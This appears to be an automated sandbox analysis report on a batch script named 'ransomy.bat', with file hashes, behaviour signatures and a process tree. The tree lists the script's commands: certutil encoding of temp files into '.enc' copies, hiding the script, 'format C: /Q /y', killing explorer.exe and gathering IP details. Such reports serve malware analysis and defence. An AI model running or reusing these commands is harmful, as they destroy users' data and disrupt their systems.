Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    12-10-2023 07:33

General

  • Target

    ransomy.bat

  • Size

    76KB

  • MD5

    ac7bd476884ac22af065c826c9a2c58f

  • SHA1

    a02294112ff2e1fdfa74f9a756e60b6cfbabbb8c

  • SHA256

    89d2f519899c83c730725ff810a5e404346386f634d41ddffa366aded01d618e

  • SHA512

    230c25e85109aecc93768b98e65eccc9733a6179a891ff75bfcf4bcf588ae0287af8433037e87baf2b01169bfbbb82ea00eb9533e092a5bd9c0800d3c72f715d

  • SSDEEP

    384:zqmB+m9dm9hm9rm99m93ml5mlomlumlSmlcmlsmlkmllmlZmjDmlfmn7mlJmlTmI:TjcIm8KcBn7Vl9oemQes2kL

Score
1/10

Malware Config

Signatures

  • Gathers network information (2 TTPs, 1 IoCs)

    Uses commandline utility to view network configuration.

  • Kills process with taskkill (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of WriteProcessMemory (48 IoCs)
  • Views/modifies file attributes (1 TTPs, 1 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ransomy.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt" "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt.enc"
      2⤵
      PID:1228
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_SetupUtility.txt" "C:\Users\Admin\AppData\Local\Temp\dd_SetupUtility.txt.enc"
      2⤵
      PID:1532
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI1F75.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI1F75.txt.enc"
      2⤵
      PID:1892
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI1FD7.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI1FD7.txt.enc"
      2⤵
      PID:2424
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI1F75.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI1F75.txt.enc"
      2⤵
      PID:2992
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI1FD7.txt" "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI1FD7.txt.enc"
      2⤵
      PID:2560
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_wcf_CA_smci_20230901_013010_697.txt" "C:\Users\Admin\AppData\Local\Temp\dd_wcf_CA_smci_20230901_013010_697.txt.enc"
      2⤵
      PID:3036
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\dd_wcf_CA_smci_20230901_013011_945.txt" "C:\Users\Admin\AppData\Local\Temp\dd_wcf_CA_smci_20230901_013011_945.txt.enc"
      2⤵
      PID:2260
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\FXSAPIDebugLogFile.txt" "C:\Users\Admin\AppData\Local\Temp\FXSAPIDebugLogFile.txt.enc"
      2⤵
      PID:2596
    • C:\Windows\system32\certutil.exe
      certutil -encode "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20230901_012943179-MSI_netfx_Full_x64.msi.txt" "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20230901_012943179-MSI_netfx_Full_x64.msi.txt.enc"
      2⤵
      PID:2668
    • C:\Windows\system32\attrib.exe
      attrib +h C:\Users\Admin\AppData\Local\Temp\ransomy.bat
      2⤵
      • Views/modifies file attributes
      PID:2680
    • C:\Windows\system32\format.com
      format C: /Q /y
      2⤵
      PID:2696
    • C:\Windows\system32\mode.com
      mode con cols=107 lines=41
      2⤵
      PID:2720
    • C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2708
    • C:\Windows\system32\ipconfig.exe
      ipconfig
      2⤵
      • Gathers network information
      PID:2780
    • C:\Windows\system32\findstr.exe
      findstr IPv4
      2⤵
      PID:2488

Network

MITRE ATT&CK Enterprise v15


Downloads